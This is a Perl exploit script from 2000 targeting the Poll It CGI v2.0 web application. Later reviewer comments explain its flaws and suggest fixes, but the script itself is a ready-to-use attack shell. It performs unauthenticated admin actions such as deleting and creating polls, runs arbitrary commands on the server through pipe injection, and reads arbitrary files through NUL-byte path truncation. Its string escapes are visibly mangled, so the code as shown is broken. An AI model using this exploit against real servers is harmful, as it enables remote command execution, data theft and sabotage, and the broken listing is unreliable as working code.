# Title : Poll It CGI v2.0 exploit
# Published : 2000-11-15
# Author : keelis
#!/usr/bin/perl
######################################
# #
# #
# Poll It CGI v2.0 exploit #
# keelis/havoc korp 2000 #
# #
# shouts to modjo, p, zen, kd, #
# ab, all the script kiddies. #
# #
# #
# keelis(at)hushmail(dot)com #
# #
# #
######################################
use Socket;
# Interactive front end: <host> and <cgi_loc> come from the command line, and
# every command below is turned into one GET request to the CGI's admin
# interface by make_request() (see that sub for the protocol handling).
#
# NOTE(review): backslash escapes appear to have been stripped from this
# listing ("nn", "rnrn", and the quotes around "$param" in the messages), so
# the text as shown is not valid Perl; read the string literals accordingly.
#
# What the requests rely on, seen from the defender's side:
#   - every admin action is sent with an empty admin_password, i.e. the CGI is
#     assumed to perform state-changing admin actions without verifying the
#     password (missing authentication on the "load=admin" path);
#   - the "g" command appends an encoded "|" (%7C) to poll_options and the help
#     text calls it "run <param>" - the shape of a pipe-open injection on a
#     value the CGI later opens; presumably a 2-arg open, verify against the
#     CGI source;
#   - the "r" command appends "%00" to data_dir: NUL-byte truncation of a path
#     built from a request parameter.
# Mitigations for the CGI: authenticate before any admin action, never let a
# request parameter choose the data directory, reject NUL bytes and shell
# metacharacters in input, and use 3-arg open / list-form system.
($host, $cgi_loc) = @ARGV[0,1];
# NOTE(review): inet_aton returns undef for an unresolvable host; that is not
# checked here and only surfaces later as a failed connect in sendraw().
$ip=inet_aton($host);
# Banner is printed before the argument check, so usage() appears below it.
print("nt+--- Poll It CGI v2.0 exploit ---+");
print("nt+--- keelis/havoc korp 2000 ---+nnn");
usage() if (!defined($host) || !defined($cgi_loc));
# "true" is a bareword (no strict), i.e. the constant string "true", so this is
# an endless loop left only by "x" (last) or by die() inside make_request().
while(true)
{
print "[poll@$host] ";
# One command line per iteration: first word is the command, the rest (if
# any) is its single parameter.
$stdin = *STDIN;
$cmdin = <$stdin>;
chomp($cmdin);
($cmd, $param) = split(/ /, $cmdin, 2);
# Each branch sets the package globals $request / $success_msg that
# make_request() reads; $param is interpolated into the query string as-is
# (only the encoding done in make_request() applies).
if ($cmd eq "d")
{
$request = "?load=admin&admin_password=&action=delete_poll";
$success_msg = "current poll has been deletednn";
make_request();
}
if ($cmd eq "e")
{
$request = "?load=admin&admin_password=&action=expire_poll";
$success_msg = "current poll has been expirednn";
make_request();
}
if ($cmd eq "c")
{
if (!defined($param))
{
print "you need to specify a voting topic for the new pollnn";
next;
}
$request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param";
$success_msg = "created new poll with voting topic: "$param"nn";
make_request();
}
if ($cmd eq "a")
{
if (!defined($param))
{
print "you need to specify the text for the new voting optionnn";
next;
}
$request = "?load=admin&admin_password=&action=add_option&add_option=$param";
$success_msg = "voting option added to current poll: "$param"nn";
make_request();
}
if ($cmd eq "g")
{
if (!defined($param))
{
print "you need to specify the command to be runnn";
next;
}
# Trailing %7C ("|") on poll_options - see the pipe-open note at the top.
$request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C";
$success_msg = "command has been run on remote server: "$param"nn";
make_request();
}
if ($cmd eq "r")
{
if (!defined($param))
{
print "you need to specify the file to be readnn";
next;
}
# Trailing %00 on data_dir - NUL-byte path truncation, see note at the top.
# No admin_password here: this path needs no admin action at all.
$request = "?load=admin&data_dir=$param%00";
$success_msg = "contents of "$param" follow:nn";
make_request();
}
if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help")
{
print "n? ttshow this help screenn";
print "d ttdelete current polln";
print "e ttexpire current polln";
print "c <param>tcreate new poll using <param> as topicn";
print "a <param>tadd <param> to voting optionsn";
print "r <param>tread the file <param> in remote servern";
print "g <param>trun <param> in the remote servern";
print "x ttexit pollex.pl shellnn";
next;
}
if ($cmd eq "x")
{
print "n";
last;
}
# Reached for unknown commands only because make_request() ends with "next",
# which leaves the sub and restarts this loop (see make_request).
print "command not found. use "?" for help screen.nn";
}
# Sends the query string in the package global $request to the CGI and reports
# the outcome using $success_msg, $cmd and $param (all globals set by the
# main loop).  Its last statement is "next", which exits the sub and resumes
# the caller's while loop; that is what keeps the main loop's "command not
# found" line from running after a handled command.  Perl warns "Exiting
# subroutine via next" for this, and the sub is unusable outside the loop.
sub make_request {
# Minimal URL encoding: spaces become "+".  The next two substitutions look
# as if they were meant to encode "\" and "/" as %5C and %2F, but the
# patterns as shown are mangled (see the escape note at the top of the file).
$request=~s/ /+/g;
$request=~s/\/%5C/g;
$request=~s///%2F/g;
# Raw HTTP/1.1 GET with a Host header; sendraw() returns the reply lines.
my @req=sendraw("GET $cgi_loc$request HTTP/1.1rnHost: $hostrnrn");
$reqanswer=join('', @req);
# Status code is the second token of the status line ("HTTP/1.x 200 ...").
($httpv, $httpcode) = split(/ /, $reqanswer);
$httpcode = substr($httpcode, 0, 3);
if ($httpcode eq "200") {
# For "r" the body is inspected below before anything is printed.
print $success_msg if ($cmd ne "r");
} else {
if ($httpcode ne "404")
{
print "httpd returned an error code:nn";
print $reqanswer,"n";
} else {
# 404 is treated as fatal: $cgi_loc does not point at the CGI.
die "unexpected httpd error code 404. aborting...nn"
}
}
if ($cmd eq "r")
# Drop the headers: the body starts after the first blank line.
{ $reqanswer=substr($reqanswer, index($reqanswer, "rnrn")+4);
# "Template : File" at offset 6 of the body is presumably the CGI's own
# error template for an unreadable data_dir - confirm against the CGI.
if (substr($reqanswer, 6, 15) eq "Template : File")
{
print "file "$param" not found or non-readable from cginn";
} else {
print $success_msg;
print $reqanswer,"n";
}
}
# See the note above the sub: continues the caller's loop.
next;
}
# Prints the command-line usage and exits with status 0.  Called from the main
# script when <host> or <cgi_loc> is missing.
sub usage {
print "Usage: pollex.pl <host> <cgi_loc>nn";
print "thost :thost/ip where CGI residesn";
print "tcgi_loc:tpath to the CGI (non-SSI version needed)nn";
exit(0);
}
# Opens a TCP connection to $ip (package global set by the main script) on
# port 80, writes $pstr, and returns every line read until the server closes
# the connection.  Uses the bareword global handle S and a hand-packed
# sockaddr_in ("SnA4x8": family 2, i.e. AF_INET on common platforms, port,
# 4-byte address, 8 bytes padding) rather than Socket::sockaddr_in().  No
# timeout is set, so a peer that keeps the connection open blocks on <S>.
# Dies on socket() or connect() failure.
sub sendraw {
my ($pstr)=@_;
# "|| 0" falls back to protocol 0 (the default) if the tcp lookup fails.
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("socket problems... aborting.n");
if(connect(S,pack "SnA4x8",2,80,$ip)){
# Make S the default output handle and unbuffer it, so the request is
# flushed before the blocking read below.
select(S);
$|=1;
print $pstr;
# Reads until EOF (server closes the connection) - see timeout note above.
my @in=<S>;
# Restore STDOUT as the default output handle before returning.
select(STDOUT);
close(S);
return @in;
} else {
die("can't connect... aborting.n");
}
}